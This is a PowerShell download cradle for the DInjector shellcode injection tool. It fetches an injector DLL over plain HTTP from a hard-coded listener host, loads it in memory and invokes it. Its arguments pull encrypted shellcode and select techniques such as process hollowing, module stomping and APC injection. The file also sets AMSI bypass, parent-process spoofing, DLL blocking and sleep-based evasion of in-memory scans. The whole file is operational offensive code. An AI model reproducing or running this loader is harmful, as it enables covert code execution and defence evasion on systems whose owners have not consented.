<#
.SYNOPSIS
Download cradle for DInjector: builds an argument string from the settings
below, fetches the injector assembly over HTTP, loads it from memory and
invokes its entry point. Every setting is a plain variable assigned in this
file; nothing is read from the command line.

.DESCRIPTION
Module name ($A). Choose from:
"functionpointer",
"functionpointerunsafe",
"timeformats",
"clipboardpointer",
"currentthread",
"currentthreaduuid",
"remotethread",
"remotethreaddll",
"remotethreadview",
"remotethreadsuspended",
"remotethreadkernelcb",
"remotethreadapc",
"remotethreadcontext",
"processhollowing",
"modulestomping"
#>
$A = "currentthread"
# [/sc] lhost — also the host the injector DLL itself is downloaded from (see the IWR call below)
$B = "10.10.13.37"
# [/sc] lport
$C = 80
# injector filename (fetched from http://$B:$C/$D)
$D = "DInjector.dll"
# [/sc] encrypted shellcode filename
$E = "enc"
# [/p] password to decrypt the shellcode
# NOTE: this value is embedded in cleartext in the $cmd string built below
$F = "Passw0rd!"
# [/protect] protection value that will be applied to the memory region where the shellcode resides ("RX" / "RWX", used in "currentthread")
$G = "RX"
# [/timeout] timeout for WaitForSingleObject in milliseconds (0 is serve forever, used in "currentthread")
$H = 0
# [/flipSleep] time to sleep with PAGE_NOACCESS on shellcode memory region before resuming the thread in milliseconds (0 is disable memory protection flip, used in "currentthread" and "remotethreadsuspended")
$I = 0
# [/fluctuate] protection value to fluctuate with that will be applied to the memory region where the shellcode resides; this option also activates memory obfuscation ("RW", used in "currentthread")
$J = 0
# [/image] path to the image of a newly spawned process to inject into (used in "remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing" and "modulestomping")
# if there are spaces in the image path, replace them with asterisk (*) characters (e.g., C:\Program Files\Mozilla Firefox\firefox.exe -> C:\Program*Files\Mozilla*Firefox\firefox.exe)
$K = "C:\Windows\System32\svchost.exe"
# existing process name to inject into (used in "remotethread", "remotethreaddll", "remotethreadview", "remotethreadsuspended")
# NOTE: for those modules this variable is replaced by a PID further down (see the Start-Process block)
$L = "notepad"
# parent process name to spoof the original value (use "0" to disable PPID spoofing, used in "remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing" and "modulestomping")
# NOTE: for those modules this variable is replaced by a PID further down (see the Get-Process block)
$M = "explorer"
# [/dll] loaded module (DLL) name to overwrite its .text section for storing the shellcode (used in "remotethreaddll")
$N = "msvcp_win.dll"
# [/stompDll] name of the module (DLL) to stomp (used in "modulestomping")
$O = "xpsservices.dll"
# [/stompExport] exported function name to overwrite (used in "modulestomping")
$P = "DllCanUnloadNow"
# [/sleep] number of seconds (approx.) to sleep before execution to evade potential in-memory scan (10s-60s)
$Q = 0
# [/blockDlls] block 3rd-party DLLs ("True" / "False", used in "remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing" and "modulestomping")
$R = "True"
# [/am51] bypass AMSI for current process ("True" / "False" / "Force")
$S = "True"
# [/remoteAm51] bypass AMSI for remote process ("True" / "False" / "Force", used in "remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing" and "modulestomping")
$T = "True"
# [/unhook] unhook ntdll.dll ("True" / "False")
$U = "False"
# [/debug] print debug messages ("True" / "False")
$V = "False"
# --------------------------------------------------------------------
# Modules that inject into an already running process: spawn $L as a hidden
# process and replace the name with its PID. Note that $L is therefore never
# an "existing" process here; a new one is always created.
$methods = @("remotethread", "remotethreaddll", "remotethreadview", "remotethreadsuspended")
if ($methods.Contains($A)) {
$L = (Start-Process -WindowStyle Hidden -PassThru $L).Id
}
# Modules that spawn a new process: resolve the spoofed parent name $M to a PID.
# If no such process exists, $M becomes 0, which disables PPID spoofing (see the $M comment above).
$methods = @("remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing", "modulestomping")
if ($methods.Contains($A)) {
try {
$M = (Get-Process $M -ErrorAction Stop).Id
# if multiple processes exist with the same name, arbitrarily select the first one
# (.Id over several matches yields an array, not a single value)
if ($M -is [array]) {
$M = $M[0]
}
}
catch {
$M = 0
}
}
# Single argument string handed to the injector; every option, including the
# cleartext decryption password $F, is concatenated here.
$cmd = "${A} /sc:http://${B}:${C}/${E} /p:${F} /protect:${G} /timeout:${H} /flipSleep:${I} /fluctuate:${J} /image:${K} /pid:${L} /ppid:${M} /dll:${N} /stompDll:${O} /stompExport:${P} /sleep:${Q} /blockDlls:${R} /am51:${S} /remoteAm51:${T} /unhook:${U} /debug:${V}"
# Fetch the injector DLL over plain HTTP. There is no TLS and no hash or
# signature check on the response body: whatever bytes the server (or anyone
# on the path) returns are loaded and executed by the lines below.
$data = (IWR -UseBasicParsing "http://${B}:${C}/${D}").Content
# Assembly.Load(byte[]) loads the DLL from memory; this script itself writes nothing to disk.
$assem = [System.Reflection.Assembly]::Load($data)
$flags = [Reflection.BindingFlags] "Public,NonPublic,Static"
# Locate DInjector.Detonator.Boom via reflection and invoke it with $cmd as its single argument.
$class = $assem.GetType("DInjector.Detonator", $flags)
$entry = $class.GetMethod("Boom", $flags)
$entry.Invoke($null, (, $cmd))